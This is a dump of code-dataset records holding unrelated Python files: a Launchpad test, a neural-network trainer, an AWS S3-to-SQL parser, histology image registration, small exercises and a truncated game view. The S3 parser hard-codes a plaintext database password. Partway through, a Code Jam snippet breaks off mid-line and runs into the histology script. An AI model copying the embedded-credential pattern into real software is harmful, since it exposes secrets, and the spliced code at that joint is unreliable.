MultiTableCopy._pourTable = pour_or_stop_at_pofile\n try:\n copy_active_translations(\n new_series, FakeTransaction(), DevNullLogger())\n except EarlyExit as e:\n pour_args = e.args\n pour_kwargs = e.kwargs\n finally:\n MultiTableCopy._pourTable = pour_table\n\n # Simulate another POFile being created for new_series while the\n # copier was working.\n new_template = new_series.getTranslationTemplateByName(template.name)\n new_pofile = self.factory.makePOFile(\n potemplate=new_template, language=pofile.language)\n\n # Now continue pouring the POFile table.\n pour_table(*pour_args, **pour_kwargs)\n\n # The POFile we just created in our race condition stays in\n # place. There is no error.\n resulting_pofile = new_template.getPOFileByLang(pofile.language.code)\n self.assertEqual(new_pofile, resulting_pofile)\n","repo_name":"abramhindle/UnnaturalCodeFork","sub_path":"python/testdata/launchpad/lib/lp/translations/tests/test_distroseries_translations_copy.py","file_name":"test_distroseries_translations_copy.py","file_ext":"py","file_size_in_byte":3163,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23752803809","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nadaptive_NN.py: Function to train an adaptive dense feedforward NN with\n1 hidden layer.\nAdaptive: divide the training window in classes w.r.t. theta. Classes are chosen\ns.t. the change of the coefficients of the estimator by Fu is the same in each class.\nAccording to the performance of the NN per class in comparison to all model-based\nestimators and the linear NN put more weight on classes of comparatively\npoor performance. Extent of weight increase depends on deviation from the best\nestimator the NN is compared to.\n\nCreated on Tue Mar 9 16:23:48 2020\n\n@author: Franz Baumdicker, Klara Burger\n\"\"\"\n\nfrom tensorflow import keras\nimport numpy\nimport random\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\nfrom tensorflow.keras.callbacks import EarlyStopping\nfrom sklearn.metrics import mean_squared_error\nimport tensorflow.keras.backend as K\n\n\nimport sys_path\nfrom source.dynamic_loss_classes import loss_class\nfrom source.model_based_estimators import ItV, ItMSE, watterson\n\n\ndef nmse(y_true, y_pred, a, c):\n dim = len(c) - 1\n loss_classes = [[] for i in range(dim)]\n cond = [[] for i in range(dim)]\n loss = [[] for i in range(dim)]\n\n for i in range(0, dim):\n loss_classes[i] = a[i] * K.square((y_pred - y_true) / (y_true))\n cond[i] = K.less(y_true, c[i + 1]) & K.greater(y_true, c[i])\n\n loss[0] = K.switch(cond[0], loss_classes[0], loss_classes[1])\n for i in range(1, dim):\n loss[i] = K.switch(cond[i], loss_classes[i], loss[i - 1])\n\n return K.mean(loss[dim - 1], axis=-1)\n\n\ndef loss_wrapper(a, c):\n def nmse_loss(y_true, y_pred):\n return nmse(y_true, y_pred, a, c)\n\n return nmse_loss\n\n\ndef normalise_coeff(c, n):\n norm_c = numpy.zeros((n,))\n sum = 0\n for i in range(0, n):\n sum = sum + c[i]\n for i in range(0, n):\n norm_c[i] = numpy.round(c[i] / sum, 2)\n return norm_c\n\n\ndef train_adaptive_NN_1hl(\n n,\n num_hidden_nodes,\n num_class,\n num_NN,\n theta_min,\n theta_max,\n tol,\n max_it,\n sloppiness,\n sim_filepath,\n sim_filename,\n linear_NN_filepath,\n linear_NN_filename,\n save_filepath,\n):\n\n # check if input is reasonable\n\n # load training data\n sim_data = sim_filepath + sim_filename + \".npz\"\n input_train = numpy.load(sim_data)\n\n linear_NN = linear_NN_filepath + linear_NN_filename\n\n print(\"load data\")\n # convert training data into numpy arrays and then into pandas dataframes\n df1 = []\n df2 = []\n df3 = []\n df4 = []\n X_all = []\n Y_all = []\n for SFS, theta in zip(input_train[\"multi_SFS\"], input_train[\"multi_theta\"]):\n df1.append(SFS[0 : n - 1].tolist())\n df2.append(theta)\n df3 = numpy.array(df1)\n df4 = numpy.array(df2)\n X_all = pd.DataFrame(df3)\n Y_all = pd.DataFrame(df4)\n\n # splitting the training data into train(80%) and validation (20%) data\n X_train, X_valid, y_train, y_valid = train_test_split(\n X_all, Y_all, train_size=0.8, shuffle=True\n )\n\n X_val = numpy.array(X_valid)\n y_val = numpy.array(y_valid)\n\n X_train_NN, X_valid_NN, y_train_NN, y_valid_NN = train_test_split(\n X_train, y_train, train_size=0.8, shuffle=True\n )\n\n print(\"create classes for adaptive loss function (this step may take a few minutes)\")\n # create classes for loss function\n c = loss_class(n, num_class, theta_min, theta_max, tol)\n\n # divide samples from validation data set into classes\n X_valid_class = [[] for i in range(num_class)]\n y_valid_class = [[] for i in range(num_class)]\n for j in range(0, len(y_valid)):\n for k in range(0, num_class + 1):\n if y_val[j] >= c[k] and y_val[j] < c[k + 1]:\n X_valid_class[k].append(X_val[j, :])\n y_valid_class[k].append(y_val[j][0])\n\n # compute nmse for all estimators used for comparison\n Wat_est = [[] for i in range(num_class)]\n Wat_nmse = [[] for i in range(num_class)]\n ItV_est = [[] for i in range(num_class)]\n ItV_nmse = [[] for i in range(num_class)]\n ItMSE_est = [[] for i in range(num_class)]\n ItMSE_nmse = [[] for i in range(num_class)]\n Linear_NN_est = [[] for i in range(num_class)]\n Linear_NN_nmse = [[] for i in range(num_class)]\n\n for k in range(0, num_class):\n ItV_est[k].append(ItV(numpy.array(X_valid_class[k]), 1e-3))\n ItMSE_est[k].append(ItMSE(numpy.array(X_valid_class[k]), 1e-3))\n Linear_NN_est[k].append(\n keras.models.load_model(linear_NN, compile=False).predict(\n pd.DataFrame(X_valid_class[k])\n )\n )\n for j in range(len(y_valid_class[k])):\n Wat_est[k].append(watterson(X_valid_class[k][j]))\n ItV_nmse[k].append(\n mean_squared_error(\n numpy.sqrt(y_valid_class[k]),\n numpy.divide(ItV_est[k][0], numpy.sqrt(y_valid_class[k]).reshape(-1)),\n )\n )\n ItMSE_nmse[k].append(\n mean_squared_error(\n numpy.sqrt(y_valid_class[k]),\n numpy.divide(ItMSE_est[k][0], numpy.sqrt(y_valid_class[k]).reshape(-1)),\n )\n )\n Wat_nmse[k].append(\n mean_squared_error(\n numpy.sqrt(y_valid_class[k]),\n numpy.divide(Wat_est[k], numpy.sqrt(y_valid_class[k]).reshape(-1)),\n )\n )\n Linear_NN_nmse[k].append(\n mean_squared_error(\n numpy.sqrt(y_valid_class[k]),\n numpy.divide(\n Linear_NN_est[k][0].reshape(-1),\n numpy.sqrt(y_valid_class[k]).reshape(-1),\n ),\n )\n )\n\n coefficients = [[] for j in range(num_NN)]\n coeff_normalised = [[] for j in range(num_NN)]\n it = numpy.zeros((num_NN,))\n\n print(\"start training NN adaptively\")\n for j in range(1, num_NN + 1):\n # reset weights for NN\n model1 = keras.models.Sequential(\n [\n keras.layers.Dense(\n num_hidden_nodes,\n activation=\"relu\",\n use_bias=True,\n input_shape=(n - 1,),\n ),\n keras.layers.Dense(1, use_bias=False),\n ]\n )\n reset_weights = model1.get_weights()\n a = numpy.ones((num_class,))\n\n for i in range(0, max_it):\n check = 0\n NN = keras.models.Sequential(\n [\n keras.layers.Dense(\n num_hidden_nodes,\n activation=\"relu\",\n use_bias=True,\n input_shape=(n - 1,),\n ),\n keras.layers.Dense(1, use_bias=False),\n ]\n )\n if i == 0:\n NN.set_weights(reset_weights)\n\n custom_loss = loss_wrapper(a, c)\n NN.compile(loss=custom_loss, optimizer=\"adam\")\n\n callbacks = [\n EarlyStopping(monitor=\"val_loss\", patience=1, restore_best_weights=True)\n ]\n\n NN.fit(\n X_train_NN,\n y_train_NN,\n epochs=500,\n callbacks=callbacks,\n validation_data=(X_valid_NN, y_valid_NN),\n batch_size=64,\n )\n\n NN_est = [[] for j in range(num_class)]\n NN_nmse = [[] for j in range(num_class)]\n\n for k in range(0, num_class):\n NN_est[k].append(NN.predict(pd.DataFrame(X_valid_class[k])))\n NN_nmse[k].append(\n mean_squared_error(\n numpy.sqrt(y_valid_class[k]),\n numpy.divide(\n NN_est[k][0].reshape(-1),\n numpy.sqrt(y_valid_class[k]).reshape(-1),\n ),\n )\n )\n\n benchmark_min = [[] for j in range(num_class)]\n D = numpy.zeros((num_class,))\n NMSE_p = numpy.zeros((num_class,))\n for k in range(0, num_class):\n benchmark_min[k] = numpy.amin(\n [\n Wat_nmse[k][0],\n ItV_nmse[k][0],\n ItV_nmse[k][0],\n Linear_NN_nmse[k][0],\n ]\n )\n D[k] = NN_nmse[k][0] - benchmark_min[k]\n NMSE_p[k] = numpy.maximum(D[k] / benchmark_min[k], 0)\n\n M = numpy.amax(NMSE_p)\n if M == 0:\n print(\"iteration:\", i, \"M=0\")\n break\n\n for k in range(0, num_class):\n if NN_nmse[k] > (1 + sloppiness) * benchmark_min[k]:\n a[k] = a[k] + random.uniform(0.25, 0.5) * NMSE_p[k] / M\n check = check + 1\n\n if check == 0:\n break\n print(\"iteration:\", i)\n\n # if maximal number of epoches has been reached, signal it in the\n # following training statistics\n if i == max_it - 1:\n print(\n \"ERROR: maximal number of iterations for training has been reached\",\n j,\n \"! Start training again.\",\n )\n it[j - 1] = -1\n coefficients[j - 1].append(numpy.zeros((num_class,)))\n coeff_normalised[j - 1].append(numpy.zeros((num_class,)))\n print(\"coefficients:\", coefficients)\n print(\"normalised coefficients:\", coeff_normalised)\n print(\"iterations:\", it)\n\n # if training completed properly, safe training statistics and NN\n if check == 0 or M == 0:\n print(\"number of iterations for training:\", i + 1, \"NN Nr.:\", j)\n it[j - 1] = i + 1\n coefficients[j - 1].append(numpy.round(a, 2))\n coeff_normalised[j - 1].append(\n normalise_coeff(numpy.round(a, 2), num_class)\n )\n print(\"coefficients:\", coefficients)\n print(\"normalised coefficients:\", coeff_normalised)\n print(\"iterations:\", it)\n # save NN\n filename = (\n save_filepath\n + \"adaptive_NN_1hl_\"\n + str(num_hidden_nodes)\n + \"_\"\n + sim_filename\n + \"_\"\n + str(j)\n )\n NN.save(filename)\n print(\"NN\", j, \"has been trained SUCCESSFULLY!\")\n print(\"NN\", j, \"has been saved in:\", filename)\n","repo_name":"fbaumdicker/ML_in_pop_gen","sub_path":"source/adaptive_NN.py","file_name":"adaptive_NN.py","file_ext":"py","file_size_in_byte":10617,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"27533655239","text":"import json\nfrom pprint import pprint\nimport boto3\nimport pyodbc\nimport os\nimport gzip\nimport shutil\n\ns3 = boto3.client('s3')\nserver='SD-AE79-EF8E\\HCSQLSERVER1,2431'\ndatabase='hybrid_cloud'\nusername = 'testuser'\npassword ='TestingSQL@1234'\ndriver = '/opt/microsoft/msodbcsql17/lib64/libmsodbcsql-17.2.so.0.1'\nbucket = \"parser-demo\"\nconnection = pyodbc.connect('DRIVER='+driver+';SERVER='+server+';PORT=2431;DATABASE='+database+';UID='+username+';PWD='+password)\ncursor = connection.cursor()\n\ndef lambda_handler():\n object_list = s3.list_objects(Bucket=bucket)\n for objects in object_list['Contents']:\n json_obj = objects['Key']\n target = json_obj.split('/')\n target_file = '-'.join(target)\n #length = len(target) - 1\n #target_obj = target[length]\n with open (target_file, 'wb') as data:\n s3.download_fileobj(bucket, json_obj, data)\n for f in os.listdir('.'):\n if f.endswith('.gz'):\n with gzip.open(f, 'rb') as f_in:\n file_name_json = f[0:-3]\n file_name = str(file_name_json) + \".json\" \n with open(file_name, 'wb') as f_out:\n shutil.copyfileobj(f_in, f_out)\n os.remove(f)\n for f in os.listdir('.'):\n with open (f, 'r') as json_file:\n if f.endswith('.json'):\n try:\n json_obj = json.load(json_file)\n json_str = json_obj['configurationItems']\n new_dict = {}\n for i in json_str:\n new_dict['resourceType'] = i['resourceType']\n new_dict['resourceId'] = i['resourceId']\n try:\n new_dict['arn'] = i['ARN']\n except Exception:\n new_dict['arn'] = None\n error = \"No ARN in file: %s\" %(f)\n print(error)\n new_dict['relatedEvents'] = i['relatedEvents'] if i['relatedEvents'] else None\n new_dict['relationships'] = i['relationships'] if i['relationships'] else None\n new_dict['supplementaryConfiguration'] = i['supplementaryConfiguration'] if i['supplementaryConfiguration'] else None\n new_dict['tags'] = i['tags'] if i['tags'] else None\n new_dict['configurationItemVersion'] = i['configurationItemVersion'] if i['configurationItemVersion'] else None\n new_dict['configurationItemCaptureTime'] = i['configurationItemCaptureTime']\n new_dict['awsAccountId'] = i['awsAccountId']\n new_dict['configurationItemStatus'] = i['configurationItemStatus']\n new_dict['awsRegion'] = i['awsRegion']\n new_dict['configurationStateMd5Hash'] = i['configurationStateMd5Hash'] if i['configurationStateMd5Hash'] else None\n #print(new_dict)\n cursor.execute(\"INSERT INTO Inventory_Complete(1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ? ,?)\" , new_dict['resourceId'],\n new_dict['relatedEvents'], new_dict['relationships'], new_dict['supplementaryConfiguration'], new_dict['tags'], new_dict['configurationItemVersion'],\n new_dict['awsAccountId'], new_dict['configurationItemStatus'], new_dict['configurationStateMd5Hash'], new_dict['resourceType'], new_dict['arn'],\n new_dict['awsRegion']) \n #cursor.execute(command) \n #connection.commit()\n #connection.close()\n \n except Exception as e:\n error = \"Error on\" + str(f)\n print(error)\n\n\nlambda_handler()","repo_name":"the-indian-saint/AWS-Scripts","sub_path":"DynamoDB/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":3920,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"36041934244","text":"from zope.component import (\n adapter,\n getSiteManager,\n )\nfrom zope.interface import (\n implementer,\n Interface,\n )\nfrom zope.processlifetime import IDatabaseOpened\nfrom zope.publisher.interfaces import IRequest\nfrom zope.publisher.interfaces.browser import IBrowserRequest\nfrom zope.publisher.interfaces.http import IHTTPRequest\nfrom zope.traversing.interfaces import ITraversable\n\n\n@implementer(Interface)\ndef adapter_mask(*args):\n return None\n\n\n@adapter(IDatabaseOpened)\ndef handle_process_start(ev):\n \"\"\"Post-process ZCML configuration.\n\n Normal configuration should happen in ZCML (or whatever our Zope\n configuration standard might become in the future). The only kind\n of configuration that should happen here is automated fix-up\n configuration. Code below should call functions, each of which explains\n why it cannot be performed in ZCML.\n\n Also see the lp_sitecustomize module for initialization that is done when\n Python first starts.\n \"\"\"\n fix_up_namespace_traversers()\n\n\ndef fix_up_namespace_traversers():\n \"\"\"Block namespace traversers from being found as normal views.\n\n See bug 589010.\n\n This is done in a function rather than in ZCML because automation is\n appropriate: there has already been an explicit registration of the\n namespace, and having to also say \"please don't assume it is a view\"\n is a DRY violation that we can avoid.\n \"\"\"\n sm = getSiteManager()\n info = 'see %s.fix_up_namespace_traversers' % (__name__,)\n namespace_factories = sm.adapters.lookupAll(\n (Interface, IBrowserRequest), ITraversable)\n for request_iface in (Interface, IRequest, IHTTPRequest, IBrowserRequest):\n for name, factory in namespace_factories:\n current = sm.adapters.lookup(\n (Interface, request_iface), Interface, name)\n if current is factory:\n sm.registerAdapter(\n adapter_mask,\n required=(Interface, request_iface), name=name, info=info)\n","repo_name":"abramhindle/UnnaturalCodeFork","sub_path":"python/testdata/launchpad/lib/lp/services/webapp/initialization.py","file_name":"initialization.py","file_ext":"py","file_size_in_byte":2034,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23558712301","text":"# input() reads a string with a line of input, stripping the '\\n' (newline) at the end.\r\n# This is all you need for most Google Code Jam problems.\r\ncases = int(input()) # read a line with a single integer\r\nmax_num = []\r\nfor i in range(1, cases + 1):\r\n max_num.append(int(input())) \r\n \r\n \r\n \r\n \r\ndef check(num):\r\n\tlst = str(num)\r\n\tfor x in range(1,len(lst)):\r\n\t\tif (int(lst[x]) < int(lst[x-1]))\t:\r\n\t\t\treturn True\r\n\treturn False\r\n\t\t \r\n \r\n \r\nsolutions = []\r\nfor num in max_num:\r\n\twhile(check(num)):\r\n\t\tdigits = str(num)\r\n\t\tif(digits[-1] == \"0\"):\r\n\t\t\tnum -= 1\r\n\t\tfor x in range(1,len(digits)):\r\n\t\t\tif (digits[x] Iteration {epoch:3} Energy: {loss.item():.3f}')\n\n loss.backward() # Compute the gradients\n optimizer.step() #\n\n if epoch % 2 == 0:\n with torch.no_grad():\n U, s, V = model.affine.clone().svd()\n model.affine.data = torch.mm(U, V.transpose(1, 0))\n\n # if epoch >= 2:\n if epoch > 10 and np.mean(energy[-10:]) - energy[-1] < 0.01:\n break\n\n itr_affine = torch.eye(3, device=device, dtype=torch.float32)\n itr_affine[0:2, 0:2] = model.affine\n itr_affine[0:2, 2] = model.translation\n\n opt_affine = torch.matmul(itr_affine.detach(), affine)\n\n # Create a new resample filter to make sure everything works\n optaff_filter = so.AffineTransform.Create(affine=opt_affine, device=device)\n\n aff_histopathology = optaff_filter(histology, blockface)\n\n return aff_histopathology, opt_affine\n\n\ndef deformable_histology_to_blockface(histology, blockface, scales, steps, gauss=True, mic=None):\n deformation = blockface.clone()\n deformation.set_to_identity_lut_()\n deformation_list = []\n orig_histology = histology.clone()\n\n # Create a grid composer\n composer = so.ComposeGrids(device=device, dtype=torch.float32, padding_mode='border')\n\n if gauss:\n # Need do some blurring for the mic\n gauss = so.Gaussian.Create(\n channels=1,\n kernel_size=50,\n sigma=20,\n device=device\n )\n #\n histology = gauss(histology)\n\n # Steps\n for s in scales:\n\n temp_mic = histology.clone()\n temp_block = blockface.clone()\n\n scale_source = temp_mic.set_size(histology.size // s, inplace=False)\n scale_target = temp_block.set_size(blockface.size // s, inplace=False)\n deformation = deformation.set_size(blockface.size // s, inplace=False)\n\n # Apply the deformation to the source image\n scale_source = so.ApplyGrid(deformation)(scale_source)\n\n operator = so.FluidKernel.Create(\n scale_target,\n device=device,\n alpha=1.0,\n beta=0.0,\n gamma=0.001,\n )\n\n similarity = so.L2Similarity.Create(dim=2, device=device)\n\n match = st.IterativeMatch.Create(\n source=scale_source,\n target=scale_target,\n similarity=similarity,\n operator=operator,\n device=device,\n step_size=steps[scales.index(s)],\n incompressible=False\n )\n\n energy = [match.initial_energy]\n print(f'Iteration: 0 Energy: {match.initial_energy}')\n\n for i in range(1, 500):\n energy.append(match.step())\n print(f'Iteration: {i} Energy: {energy[-1]}')\n\n if i > 10 and np.mean(energy[-10:]) - energy[-1] < 0.001:\n break\n\n deformation = match.get_field()\n deformation_list.append(deformation.clone().set_size(histology.size, inplace=False))\n deformation = composer(deformation_list[::-1])\n\n # Compose the deformation fields\n source_def = so.ApplyGrid(deformation, device=device)(orig_histology, deformation)\n\n return source_def, deformation\n\n\ndef register_histopathology_to_blockface(rabbit, block, img_num, bf_slice):\n\n blockface_dir = f'/hdscratch/ucair/{rabbit}/blockface/{block}/'\n histology_dir = f'/hdscratch/ucair/{rabbit}/microscopic/{block}/'\n out_dir = f'{histology_dir}deformations/'\n\n if not os.path.exists(out_dir):\n os.makedirs(out_dir)\n\n # if os.path.exists(f'{out_dir}/img_{img_num}_deformation_to_blockface.mhd'):\n # return\n\n # Load and make the histopathology segmentation\n segs = []\n segs += [io.LoadITKFile(f'{histology_dir}segmentations/IMG_{img_num}/img_{img_num}_healthy_tissue.nrrd',\n device=device)]\n if os.path.exists(f'{histology_dir}segmentations/IMG_{img_num}/img_{img_num}_ablated_region.nrrd'):\n segs += [io.LoadITKFile(f'{histology_dir}segmentations/IMG_{img_num}/img_{img_num}_ablated_region.nrrd',\n device=device)]\n if os.path.exists(f'{histology_dir}segmentations/IMG_{img_num}/img_{img_num}_uncertain_region.nrrd'):\n segs += [io.LoadITKFile(f'{histology_dir}segmentations/IMG_{img_num}/img_{img_num}_uncertain_region.nrrd',\n device=device)]\n\n histology_seg = core.StructuredGrid.FromGrid(segs[0], channels=1)\n for seg in segs:\n histology_seg += seg\n\n try:\n blockface_seg = io.LoadITKFile(f'{blockface_dir}volumes/raw/hd_labels/{block}_hdlabel_volume.nrrd',\n device=device)\n except:\n blockface_seg = io.LoadITKFile(f'{blockface_dir}volumes/raw/segmentation_volume.nrrd',\n device=device)\n\n # # Load the surface slice and get the difference\n # blockface_surf = io.LoadITKFile(f'{blockface_dir}volumes/raw/surface/IMG_{bf_slice:03d}_surface.mhd',\n # device=device)\n #\n # blockface_surf_p1 = io.LoadITKFile(f'{blockface_dir}volumes/raw/surface/IMG_{bf_slice + 1:03d}_surface.mhd',\n # device=device)\n #\n # diff = (blockface_surf - blockface_surf_p1).data[2]\n #\n # diff = (diff - diff.min()) / (diff.max() - diff.min())\n\n # Extract the slice\n blockface_seg = blockface_seg.extract_slice(bf_slice - 1, dim=0)\n\n aff_seg, affine = solve_affine(histology_seg, blockface_seg, img_num, out_dir=out_dir, device=device)\n np.savetxt(f'{out_dir}/img_{img_num}_affine_to_blockface.txt', affine.cpu().numpy())\n\n #### Apply the affine to the image\n mic_file = f'{histology_dir}hdf5/{block}_img{img_num}_image.hdf5'\n\n meta_dict = {}\n with h5py.File(mic_file, 'r') as f:\n mic = f['RawImage/ImageData'][:, ::10, ::10]\n for key in f['RawImage'].attrs:\n meta_dict[key] = f['RawImage'].attrs[key]\n\n mic = core.StructuredGrid(\n mic.shape[1:],\n tensor=torch.tensor(mic, dtype=torch.float32, device=device),\n spacing=torch.tensor([10.0, 10.0], dtype=torch.float32, device=device),\n origin=histology_seg.origin,\n device=device,\n dtype=torch.float32,\n channels=3\n )\n\n mic = (mic - mic.min()) / (mic.max() - mic.min())\n aff_mic = so.AffineTransform.Create(affine=affine)(mic, blockface_seg)\n # plt.figure()\n # plt.imshow(aff_mic.data.permute(1,2,0).cpu())\n # plt.axis('off')\n # plt.gca().invert_yaxis()\n # plt.savefig(f'/home/sci/blakez/ucair/Animations/Scrolls/Mic/Images/{blockface_slice}_image.png', dpi=500, bbox_inches='tight', pad_inches=0)\n\n def_histology, deformation = deformable_histology_to_blockface(\n aff_seg,\n blockface_seg,\n steps=[0.01, 0.005],\n scales=[4, 1],\n gauss=True, \n mic=aff_mic\n )\n\n # Save out the deformation\n io.SaveITKFile(deformation, f'{out_dir}/img_{img_num}_deformation_to_blockface.mhd')\n\n\nif __name__ == '__main__':\n rabbit = '18_060'\n block_list = sorted(glob.glob(f'/hdscratch/ucair/{rabbit}/microscopic/block*'))\n for block_path in block_list[5:7]:\n block = block_path.split('/')[-1]\n raw_images = glob.glob(f'/hdscratch/ucair/{rabbit}/microscopic/{block}/raw/*_image.tif')\n raw_images = sorted(glob.glob(f'/hdscratch/ucair/{rabbit}/microscopic/{block}/raw/*_image.jpg') + raw_images)\n\n cur_nums = [int(x.split('/')[-1].split('_')[1]) for x in raw_images]\n\n for im in cur_nums:\n img = f'{im:03d}'\n blockface_slice = im\n register_histopathology_to_blockface(rabbit, block, img, blockface_slice)\n # apply_deformation_to_histology(rabbit, block, img)\n","repo_name":"blakezim/MR_Hist","sub_path":"Histology/Histopathology_to_Blockface.py","file_name":"Histopathology_to_Blockface.py","file_ext":"py","file_size_in_byte":11205,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72907304835","text":"import os\r\nimport matplotlib.image as image\r\n\r\n# path_import = r'V:\\Scratch\\hi\\my\\Datenauswahl'\r\npath_import = r'D:\\MA_Liang\\Data_Analysis\\Decoating Number\\RTCR25\\Once Decoating'\r\n\r\n#runtime settings \r\nn_resize = 1 #specfify resolution (ideally: n_resize = 1), use only every n-th row and column to reduce runtime, typical value for good results at a reasonable runtime: 5\r\nroh_data_filter_mat_size = 3\r\nhole_search_filter_mat_size = 5\r\npath_export = path_import + r'\\Results' + str(n_resize)\r\ntry:\r\n os.mkdir(path_export) \r\n print(\"Directory \" , path_export, \" created \") \r\nexcept FileExistsError:\r\n print(\"Directory \" , path_export, \" already exists\")\r\n\r\n#figure settings\r\nshow = True #specify if figures should be shown, disable for large datsets to save RAM\r\nshow_num_with_indentations = True #specify whether indentations should be represented with number\r\nfile_format = 'pdf' #select in which file format the files should be saved, e.g. 'pdf', 'svg', 'png', 'jpg'\r\n\r\n#%% start to analyse all CSV-files in given import-directory\r\nimport Main\r\n\r\nfolder_name = path_import.split('/')[len(path_import.split('/'))-2]\r\n\r\nlist_final = []\r\n\r\n# for loop to call file after file\r\nfor root, dirs, files in os.walk(path_import):\r\n for name in files:\r\n if os.path.splitext(name)[-1] == '.csv' and 'Results' not in name and 'characteristics' not in name:\r\n \r\n path_to_file = os.path.join(root, name)\r\n filename = os.path.join(name).split('.csv')[0]\r\n print('Dateiname: ' + filename)\r\n photo_path = path_to_file.replace('_Height.csv', '.png')\r\n print('photo path is:', photo_path)\r\n photo = image.imread(photo_path) # resize photo as the same as roh data-frame: easier for figure.f to plot photo as background\r\n \r\n #start main program\r\n res_depth, res_diameter, df_output, std_depth, std_diameter, df_error_w, df_weights, info, df, df_weights_filt, df_hole_w_2, df_controll, y, data_size, run_time_wls, run_time_hole_numbering, run_time_geometric_center, run_time_total = Main.main(filename, path_to_file, path_export, n_resize, show, file_format, photo, roh_data_filter_mat_size, hole_search_filter_mat_size, show_num_with_indentations)\r\n \r\n #save results in list\r\n list_final.append([filename, res_depth, res_diameter, df_output, std_depth, std_diameter, data_size, run_time_wls, run_time_hole_numbering, run_time_geometric_center, run_time_total])\r\n \r\n print('Tiefe: ', res_depth)\r\n print('Durchmesser: ', res_diameter)\r\n print('')\r\n#%% Barplot\r\nimport barplot\r\nbarplot.barplot(path_export,list_final,file_format)\r\n\r\n#%% export\r\nimport export\r\nexport.export(path_export, list_final, n_resize)\r\n#export.exportlumentum(path_export, list_final)\r\n","repo_name":"Roman315/MA_Liang","sub_path":"Controll.py","file_name":"Controll.py","file_ext":"py","file_size_in_byte":2850,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"40163078872","text":"import pandas as pd\nimport numpy as np\nfrom pandas import ExcelWriter\nfrom datetime import datetime, timedelta\nimport tkinter\nfrom tkinter import filedialog\nimport matplotlib.pyplot as plt\nimport matplotlib.dates as dates\n\nstart_date = datetime(2022, 6, 1)\nend_date = datetime(2023, 3, 31)\nsheet = \"HOP\"\nchart_folder = \"/Users/mikephillips/My Drive/Cottonwood/C. Equity/3. Work Product/Leasing Charts/\"\n\nprint(\"Please select the key stats vacancies file that you want to analyze.\")\nroot = tkinter.Tk()\nroot.update()\nkey_stats_vacancies_file_path = filedialog.askopenfilename()\nkey_stats_vacancies_xls = pd.ExcelFile(key_stats_vacancies_file_path)\nkey_stats_vacancies_df = pd.read_excel(key_stats_vacancies_xls, \"Sheet1\")\n\nfor unit_type in key_stats_vacancies_df['Unit Type'].unique():\n\n print(\"Unit Type: \" + unit_type)\n current_key_stats = key_stats_vacancies_df[(key_stats_vacancies_df[\"Unit Type\"] == unit_type) &\n (key_stats_vacancies_df[\"End Vacant Date\"] >= start_date) &\n (key_stats_vacancies_df[\"Prior Rent\"] > 0) &\n (key_stats_vacancies_df[\"Next Rent\"] > 0)]\n\n x = current_key_stats[\"End Vacant Date\"].values\n y = current_key_stats[\"Adjusted Uplift\"].values\n plt.figure(figsize=(10, 8))\n plt.subplots_adjust(top=0.9, bottom=0.25, left=0.2)\n ax = plt.axes()\n ax.scatter(x, y)\n ax.set_title(sheet + \" - \" + unit_type + \"\\n\", fontsize=10)\n ax.set_ylabel('Uplifts\\n', fontsize=5)\n ax.set_xlabel('\\nLease Dates', fontsize=5)\n ax.tick_params(axis='both', labelsize=5)\n ax.tick_params('x', labelrotation=30)\n ax.set_xlim(start_date, end_date)\n\n # Get values for the trend line analysis\n if len(x) > 1:\n x_num = dates.date2num(list(x))\n trend = np.polyfit(x_num, list(y), 1)\n fit = np.poly1d(trend)\n plt.plot(list(x), fit(list(x_num)), \"r--\")\n\n plt.savefig(chart_folder + sheet + \" - Uplifts - \" + unit_type + \".png\")\n plt.close()\n","repo_name":"phillips199/multifamily","sub_path":"lease_uplifts.py","file_name":"lease_uplifts.py","file_ext":"py","file_size_in_byte":1971,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"11513080476","text":"#Ler uma medida em metros e devolver em centímetros e milímetros\r\nmedida = float(input(\"Digite o número de metros a serem convertidos: \"));\r\nkm = (medida/1000);\r\nhm = (medida/100);\r\ndam= (medida/10);\r\ndm = (medida * 10);\r\ncm = (medida * 100);\r\nmm = (medida * 1000);\r\nprint(f\"Calculando...\\n{medida} metros equivalem a:\\n{km} km \\n{hm} hm \\n{dam} dam\");\r\nprint(f\"{dm} dm \\n{cm:.0f} cm \\n{mm:.0f} mm\");\r\n#.0f formata o número com nenhuma casa decimal;","repo_name":"GabriellyBailon/Cursos","sub_path":"CursoEmVideo/Python/Mundo 1/ex008.py","file_name":"ex008.py","file_ext":"py","file_size_in_byte":453,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"5010772252","text":"from Controleur.abstractView import AbstractView\n\nfrom PyInquirer import prompt, Separator\n\nclass AchatView(AbstractView):\n def __init__(self, session):\n super().__init__(session)\n # regarder quels types de questions sont adéquats\n self.question1 = [\n {\"type\": \"list\",\n \"name\": \"action\",\n \"message\": \"Quel Type de Pokéball souhaitez vous acheter ?\",\n \"choices\":[\"Acheter une pokéball\",\n Separator(),\n \"Acheter une superball\",\n Separator(),\n \"Acheter une hyperball\",\n Separator(),\n \"Revenir plus tard\"\n ]}]\n self.question2 = [\n {'type': 'input',\n 'name': 'quantite',\n 'message': 'Combien en voulez-vous ?'\n }]\n\n def display_info(self):\n super().display_info()\n with open('assets/boutique', 'r', encoding=\"utf-8\") as asset:\n print(asset.read())\n\n def make_choice(self):\n from Controleur.actionView import ActionView\n from Service.achat import Achat\n achat = Achat(self._session.joueur_actif)\n next_view = ActionView(self._session)\n ras = False\n i=0\n while ras == False:\n if i != 0:\n with open('assets/border.txt', 'r', encoding=\"utf-8\") as asset:\n print(asset.read())\n i += 1\n achat.afficher_inv()\n response1 = prompt(self.question1)\n if 